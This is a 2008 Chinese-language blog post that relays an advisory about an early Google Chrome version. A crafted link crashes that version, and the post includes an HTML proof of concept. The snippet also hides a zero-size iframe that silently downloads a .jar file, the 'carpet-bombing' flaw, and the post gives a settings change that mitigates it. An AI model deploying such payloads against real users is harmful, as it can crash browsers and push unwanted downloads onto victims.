未定义操作导致谷歌浏览器崩溃，囧

Home > 今日一点, 漏洞 > 未定义操作导致谷歌浏览器崩溃，囧

未定义操作导致谷歌浏览器崩溃，囧

September 3rd, 2008

哎呀!谷歌浏览器崩溃了，现在重新启动？

影响版本：
Google Chrome Browser 0.2.149.27
谷歌浏览器 0.2.149.27

测试环境：
windows xp sp3
windows 2003 sp1

问题：

An issue exists in how chrome behaves with undefined-handlers in chrome.dll version 0.2.149.27. A crash can result without user interaction. When a user is made to visit a malicious link, which has an undefined handler followed by a ’special’ character, the chrome crashes with a Google Chrome message window “Whoa! Google Chrome has crashed. Restart now?”. It crashes on “int 3″ at 0×01002FF3 as an exception/trap, followed by “POP EBP” instruction when pointed out by the EIP register at 0×01002FF4.

描述地址：http://evilfingers.com/advisory/google_chrome_poc.php

演示代码：

<html>
<head></head>
<body>
demo <a href=”hello:%”>HERE</a>

<iframe src=”Free Coupwns!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!.jar” frameborder=0 width=0 height=0></iframe>
</body>
</html>

关于Google chrome基于WebKit 525.13 (Safari 3.1)导致的Google Chrome vulnerable to carpet-bombing flaw 漏洞演示代码（一并看上边的演示代码），默认设置Google chrome是不提示自动下载回来的，只需要“中级用户选项”修改勾上“下载前询问每个文件的保存位置”，就可以躲过这个漏洞的侵害（PS：这样你就会收到提示保存位置，你就知道有个文件要下载来的，不然你不知不觉Google chrome就帮你下载啦）。

更多提示“哎呀!谷歌浏览器崩溃了，现在重新启动？”

谷歌浏览器